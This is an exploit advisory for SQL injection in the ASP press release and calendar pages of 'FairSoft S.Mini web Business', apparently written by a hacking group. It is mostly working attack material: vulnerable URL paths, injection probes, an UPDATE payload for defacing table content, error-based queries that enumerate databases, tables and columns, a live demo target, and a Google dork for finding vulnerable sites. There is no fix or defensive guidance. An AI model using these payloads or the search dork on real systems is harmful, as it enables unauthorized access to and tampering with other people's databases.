thnx bro
FairSoft S.Mini web Busines Prelease Calendar asp Sql injection
#include patch…ocf,ns
#(ocf/Calendar/ViewEvent.asp,ns/Calendar/ViewEvent.asp,aboutus/newsroom/ViewPressRelease.asp
Credit : CodeXpLoder'tq
Mail : codexploder[at]hotmail[dot]com
Site : codexploder.biyosecurity.net,biyofrm.com
Sourge : ocfair.com
##########################################################################
ЈЈЈ
Thnx : Liz0ziM,eno7,sao,Crackers_child,erne,The_bekir,Di_lejyoner,3APA3A
Zeberus,Hacker_Onur,DesquneR,rapstarmurat,Uyussman
and
BiyoSecurity all members
###########################################################################
^^^^
1-) example.com/[patch]/[patch]/ViewPressRelease.asp?PRelId=sql methot)
1-) example.com/ns/PressRelease/ViewPressRelease.asp?PRelId=sql methot)
2-) example.com/[patch]/[patch]/[patch]/ViewPressRelease.asp?PRelId=sql methot)
2-) example.com/fp/AboutUs/Newsroom/ViewPressRelease.asp?PRelId=sql methot)
3-) example.com/[patch]/[patch]/ViewPressRelease.asp?PRelId=sql methot)
3-) example.com/ns/Calendar/ViewEvent.asp?EventId=sql methot)
ЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈ
ЈЈЈЈ
2-) example.com/[patch]/[patch]/ViewPressRelease.asp?PRelId=(sql methot)
2-) PressRelease/ViewPressRelease.asp?PRelId(sql methot)
2-) PressRelease/ViewPressRelease.asp?PRelId=1'
2-) PressRelease/ViewPressRelease.asp?PRelId=1 having 1=1
2-) PressRelease/ViewPressRelease.asp?PRelId1,2,3,4,5
2-) PressRelease/ViewPressRelease.asp?PRelId1,2,3,4,
5+update+tbl+set+column='your text or meta code';–
2-) example.com/Calendar/ViewEvent.asp?EventId=<amt>
#for db : convert(int, db_name(1)
: convert(int, db_name(2)
#for other tbl : convert(int, (select top 1 name from sysobjects where xtype='U' and name>'TABLE'))
#for other column : convert(int, (select top 1 name from syscolumns where colid=COLUMNID and id=(select top 1 id from sysobjects where xtype='U' and name='TABLE')))
#tbl : PressReleases for #event tbl: Events
#column : ReleaseTitle #clmn : vchEventName
##########################################################
demo site: http://kerncountyfair.ntelligentsystems.com/home.asp
google search code : inurl:"ViewPressRelease.asp?PRelId"